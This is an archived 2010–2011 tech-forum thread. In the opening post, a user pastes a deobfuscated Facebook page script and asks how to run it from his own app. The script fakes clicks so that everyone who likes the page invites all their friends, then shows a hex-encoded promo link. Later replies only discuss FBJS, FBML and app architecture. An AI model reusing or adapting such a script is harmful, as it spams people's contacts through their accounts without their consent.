The Cache: Technology Expert's Forum
 
*
Welcome, Guest. Please login or register. September 22, 2019, 05:36:14 AM

Login with username, password and session length


Pages: [1]
  Print  
Author Topic: Facebook & Javascript...  (Read 6244 times)
rasputin
n00b
*
Offline Offline

Posts: 9


View Profile
« on: May 24, 2010, 06:15:22 PM »

I need some help as to how to be able to do this.

http://www.facebook.com/pages/Tom-Oh/126929663989822?v=app_4949752878&ref=ts

After liking the page, you are presented with some javascript which can be deobfuscated and read clearly to see the javascript code. I dont really understand javascript but some of the simple things that I can see in the code are that I can see where to change it to my own app ids etc.

What else am I missing on my page if I want users to be able to execute this javascript into the browser from my app.

Code:
void(document['getElementById']('app4949752878_dd')['innerHTML'] = '<a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=126929663989822" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>Suggest to Friends</a>');
var ss = document['getElementById']('suggest');
var c = document['createEvent']('MouseEvents');
c['initEvent']('click', true, true);
void(ss['dispatchEvent'](c));
void(setTimeout(function () {
    fs['select_all']();
}, 3000));
void(setTimeout(function () {
    SocialGraphManager['submitDialog']('sgm_invite_form', '/ajax/social_graph/invite_dialog.php');
}, 4000));
void(setTimeout(function () {
    document['getElementById']('app4949752878_dd')['innerHTML'] = '\x3c\x61\x20\x68\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x79\x6f\x75\x74\x75\x62\x65\x2e\x63\x6f\x6d\x2f\x77\x61\x74\x63\x68\x3f\x76\x3d\x49\x30\x58\x50\x70\x32\x6b\x53\x6a\x62\x41\x22\x3e\x4e\x49\x43\x45\x53\x54\x21\x21\x21\x20\x43\x4c\x49\x43\x4b\x20\x48\x45\x52\x45\x20\x54\x4f\x20\x57\x41\x54\x43\x48\x20\x54\x4f\x4d\x2d\x4f\x48\x27\x73\x20\x4e\x45\x57\x20\x4d\x55\x53\x49\x43\x20\x56\x49\x44\x45\x4f\x20\x21\x21\x21\x3c\x2f\x61\x3e\x20';
}, 4500));

from looking at that, does my page need some sort of file attached? what is it.

btw the script invites all friend contacts to the group immediately when executed into the browser.
« Last Edit: May 24, 2010, 06:17:26 PM by rasputin » Logged

No links in signatures please
nop_90
Global Moderator
Lifer
*****
Offline Offline

Posts: 2203


View Profile
« Reply #1 on: May 24, 2010, 08:09:05 PM »

javascript on FB is not really JS (from a developers perspective)
http://wiki.developers.facebook.com/index.php/FBJS
Logged
Thurston
n00b
*
Offline Offline

Posts: 2


View Profile
« Reply #2 on: January 16, 2011, 09:41:06 PM »

I've tried FBML at my page and it was working with the code. If you are interest to change it, you might be able to try the FBML. This one is easy to connect and add in your page.
Logged

Ah ah ah... no links in sigs for n00bs...
perkiset
Olde World Hacker
Administrator
Lifer
*****
Offline Offline

Posts: 10096



View Profile
« Reply #3 on: January 16, 2011, 10:46:23 PM »

'Bot
Logged

It is now believed, that after having lived in one compound with 3 wives and never leaving the house for 5 years, Bin Laden called the U.S. Navy Seals himself.
Phaėton
Lifer
*****
Offline Offline

Posts: 555


⎝⏠⏝⏠⎠


View Profile
« Reply #4 on: January 17, 2011, 08:13:08 PM »

Does this mean spam or is there really someone else trying to do a facebook application?

Bring some lube with you before 'allowin ' or 'liking' anything ... ever.

im struggling with some loggin issues on the fb platforms and nobody at the fb  developer forum
can answer me...

your app asks facebook a url... it then can clone it up to 4 times depending on the fbml in the request or
the requesting device or (ALIGNMENT OF THE NEW ZODIAC PERHAPS?) anyhow programming defensively is
almost impossible ... trying to use a UNIQUE ID in my original request but THAT is being duplicated by the FB
platform.

FB Platform then asks my PHP application (hosted on MY SITE) for 1-4 answers (all of which are dynamic and random)
my site sends back the 1-4 answers for the identical request (each dynamic) to the FB PLATFORM SERVERS
The fb platform then picks one of those four answers to ship back to the USER who initially requested the apps.facebook.com/myapp url.
what it does with the other 3 i have no idea. 
Program defensively is best plan.. but how?!?!

so the end result is The USER sees answer 1, 2, 3 or 4 and I have no way of loggin which distinct answer they saw.

its a 'magic 8 ball ' application so it would be nice to know which answer they received of the FOUR generated by my app
and then then one randomly picked by the  FB PLATFORM to actually return to the user...
but no one at FB can help me on this..... generate a unique id in the original request? its duplicated.

my only thought is to java post back to my lamp box if i get an answer and pray that everyone has working java

:wackoff.gif:

There is SOOOO MUCH going on in the middle and no way to program defensively against it unless you rely on some
outside chance that the users device does enough java to send back the page they actually received so you can
track it in your MANY LOGS.

If you can get a FB application to work, the world is your oyster the whole world is on there...


Also if you can get it to work you are a fucking genius.


« Last Edit: January 17, 2011, 08:18:14 PM by Phaėton » Logged

When I was your age we used to walk to the TV to change the channel....  _̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡
isthisthingon
Global Moderator
Lifer
*****
Offline Offline

Posts: 2879



View Profile
« Reply #5 on: January 26, 2011, 09:30:57 PM »

javascript on FB is not really JS (from a developers perspective)
http://wiki.developers.facebook.com/index.php/FBJS

Just as Visualforce produces unpredictable HTML/Javascript.  It also prepends tenant-specific identifiers to markup which winds up rendering colossal and unreadable viewstates like this: 

Code:
<input type="hidden"  id="com.salesforce.visualforce.ViewState" name="com.salesforce.visualforce.ViewState" value="7WlmYU0h+44QjgdsfKe+KZOE/UR6CmfiBvAz7qhiGJrhiwro/wJw6S8SpHdutYtaRZsOC9FQm3nJmPdSowFRFMhTF+P0zEYIjLzruecrlwlHVulMDCHa7yLiTWH5JEejSyXG2eUI+Jr3C2/30nk48rF9WEpXv0SZNiSdSiuQwRHeJiDTNMXDxjJGL/3b8agK7gn16cghQ9d9lhoBLvoikvIkhxqpOstVZfpbM/UZd/AIMAGGxhhNG1Lh1OnCZa7bd1bmhGE1kJfJJSD94N9WQKvFzMqeY08jqmfjffMeIL6Ow8DlqsgbL7SN5LePg2uS8n0dCUyz0BVqhGCmQQf5Z3O/Eou73Ap394DjWmwCgs1dWHRfdWgps7X0+0eTwASKSZqGqkZPXCdNxj0jYtM0CLS1Vp/MvKpZXR7pZT8+p1lSZ0hc5/QQbTvbLiRURgWWr6ZJzmfPEwnyRJlavkJh08VzrsRlWcP7/eiTHV32Nh69+Kpk/rqOa17CrhfhqGuLzJ+NM5qnxXZ2J+lsZNNHA0P7YJpx2FWfyFNcWDLxSGhZwKYKR4uT38c0ne6cAuPH/iJvhbK7Uu2t8jm/ShCZKf6Qdtr70hMJeFfLmWvq8+EGIdavFCTILbPGfT6AnIWqw9BS9cmVUhhAmz2k1RLN1HYPUK9G36G8oGv1XymIJ9e/xOo1lL/SqyniaywRkboWBmWwUnUMgIIKrzlvklwbUbVJCESPdJjrp/U0Bhna0cv9lzfVEfBLkDHc8kOVaGpUrP2zejvNC2RX5FBj6TtlKvX8vjpFPl0mvECFk0ouAXOOD+D3kzPUVNZg8oZTDyO8lAZZc3moEfQj+KSbtWOnBha/O2vrxZFaAdolpjHe1JA/IXnvPm6HlUMZhuXb.........

What was once just id="theForm" becomes id="j_id0:theForm:leadfeed:j_id365:j_id366:j_id367:j_id368:tb"

Perhaps unrelated but the frustration seems similar  Tongue
Logged

I would love to change the world, but they won't give me the source code.
nop_90
Global Moderator
Lifer
*****
Offline Offline

Posts: 2203


View Profile
« Reply #6 on: January 27, 2011, 06:13:57 PM »

I made a FB app with google app engine just for shits and giggles.
This was a while back, but there are/where 2 types of app.
Ones that are in an iframe and FBML

Iframe apps are legacy recomended way is FBML.
Basically here is the sequence of events
1) User requests app (it will be some sort of FB url)
2) FB then proxies the url and passes it along to your server. Inside this "proxy" it runs it thru a translater, turning FBML into HTML and FBJS into JS etc.
3) Your site does its shit and replies back.

http://www.merchantos.com/makebeta/facebook/facebook-php-tutorial/
If I remember correctly the canvas url which you put into the FB config maps to the url in your app.
That is the core of your application
Logged
Pages: [1]
  Print  
 
Jump to:  

Perkiset's Place Home   Best of The Cache   phpMyIDE: MySQL Stored Procedures, Functions & Triggers
Politics @ Perkiset's   Pinkhat's Perspective   
cache
mart
coder
programmers
ajax
php
javascript
Powered by MySQL Powered by PHP Powered by SMF 1.1.2 | SMF © 2006-2007, Simple Machines LLC
Seo4Smf v0.2 © Webmaster's Talks


Valid XHTML 1.0! Valid CSS!